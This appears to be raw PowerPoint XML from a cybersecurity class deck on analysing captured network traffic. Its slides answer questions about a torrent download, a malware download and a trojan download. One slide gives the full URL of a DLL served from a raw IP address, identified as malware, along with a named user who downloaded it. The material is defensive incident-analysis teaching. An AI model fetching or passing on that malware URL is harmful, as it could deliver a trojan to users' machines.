                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="640" name="Google Shape;640;p80"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6692696" y="2927900"/>
            <a:ext cx="15902353" cy="10183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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731368" y="5349367"/>
            <a:ext cx="22914900" cy="21129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lang="en-US"/>
              <a:t>Malicious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46" name="Google Shape;646;p8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Torrent Download of Copyrighted Material</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="653" name="Google Shape;653;p82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1802600"/>
            <a:ext cx="24377700" cy="972900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="1219000" spcFirstLastPara="1" rIns="1219000" wrap="square" tIns="243750">
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="13600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Summarize the following:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="13600">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="3200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="654" name="Google Shape;654;p8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655" name="Google Shape;655;p82"/>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656" name="Google Shape;656;p82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467" y="3424667"/>
            <a:ext cx="24377700" cy="9551100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="2437975" lIns="1219000" spcFirstLastPara="1" rIns="1219000" wrap="square" tIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-463550" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What kind of traffic did you observe? Which protocol(s)?</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-463550" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We observed a user downloading jpeg images from torrent domain via HTTP port 80.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-463550" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What, specifically, was the user doing? Which site were they browsing? Etc.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-463550" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://publicdomaintorrents.info/grabs/bettybooprythmonthereservationgrab.jpg</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="657" name="Google Shape;657;p82"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="16123100" y="6395163"/>
            <a:ext cx="7658100" cy="6943725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="658" name="Google Shape;658;p82"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="446975" y="6395175"/>
            <a:ext cx="15415575" cy="67159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Torrent Download of Copyrighted Material</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="665" name="Google Shape;665;p83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1802600"/>
            <a:ext cx="24377700" cy="972900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="1219000" spcFirstLastPara="1" rIns="1219000" wrap="square" tIns="243750">
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="3200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="666" name="Google Shape;666;p8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667" name="Google Shape;667;p83"/>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668" name="Google Shape;668;p83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467" y="3424667"/>
            <a:ext cx="24377700" cy="9551100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="2437975" lIns="1219000" spcFirstLastPara="1" rIns="1219000" wrap="square" tIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="669" name="Google Shape;669;p83"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="358550" y="1685925"/>
            <a:ext cx="19756452" cy="8059500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="670" name="Google Shape;670;p83"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12780613" y="4267200"/>
            <a:ext cx="11325225" cy="94488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Malware Download</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="677" name="Google Shape;677;p84"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1802600"/>
            <a:ext cx="24377700" cy="972900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="1219000" spcFirstLastPara="1" rIns="1219000" wrap="square" tIns="243750">
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="12400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Summarize the following:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="12400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="3200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="678" name="Google Shape;678;p8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679" name="Google Shape;679;p8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680" name="Google Shape;680;p84"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2" y="3113738"/>
            <a:ext cx="7370400" cy="9659100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="2437975" lIns="1219000" spcFirstLastPara="1" rIns="1219000" wrap="square" tIns="0">
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-412115" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What kind of traffic did you observe? Which protocol(s)?</a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-412115" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We observed the user Matthijs.devries downloaded a malware file june11.dll file on HTTP port 80.</a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-412115" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What, specifically, was the user doing? Which site were they browsing? Etc.</a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-412115" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://205.185.125.104/files/june11.dll</a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="681" name="Google Shape;681;p84"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8738350" y="1423200"/>
            <a:ext cx="15528850" cy="115307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Malware Download -Trojan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="688" name="Google Shape;688;p85"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1802600"/>
            <a:ext cx="24377700" cy="972900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="1219000" spcFirstLastPara="1" rIns="1219000" wrap="square" tIns="243750">
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="3200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="689" name="Google Shape;689;p8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690" name="Google Shape;690;p85"/>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691" name="Google Shape;691;p85"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2" y="3113738"/>
            <a:ext cx="7370400" cy="9659100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="2437975" lIns="1219000" spcFirstLastPara="1" rIns="1219000" wrap="square" tIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="4572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1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="692" name="Google Shape;692;p85"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3017800" y="1802600"/>
            <a:ext cx="16330710" cy="112864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Closing Remarks</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="699" name="Google Shape;699;p8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700" name="Google Shape;700;p8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701" name="Google Shape;701;p86"/>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t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="702" name="Google Shape;702;p86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8" y="3688133"/>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lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WordPress is insecure by default.</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="703" name="Google Shape;703;p86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
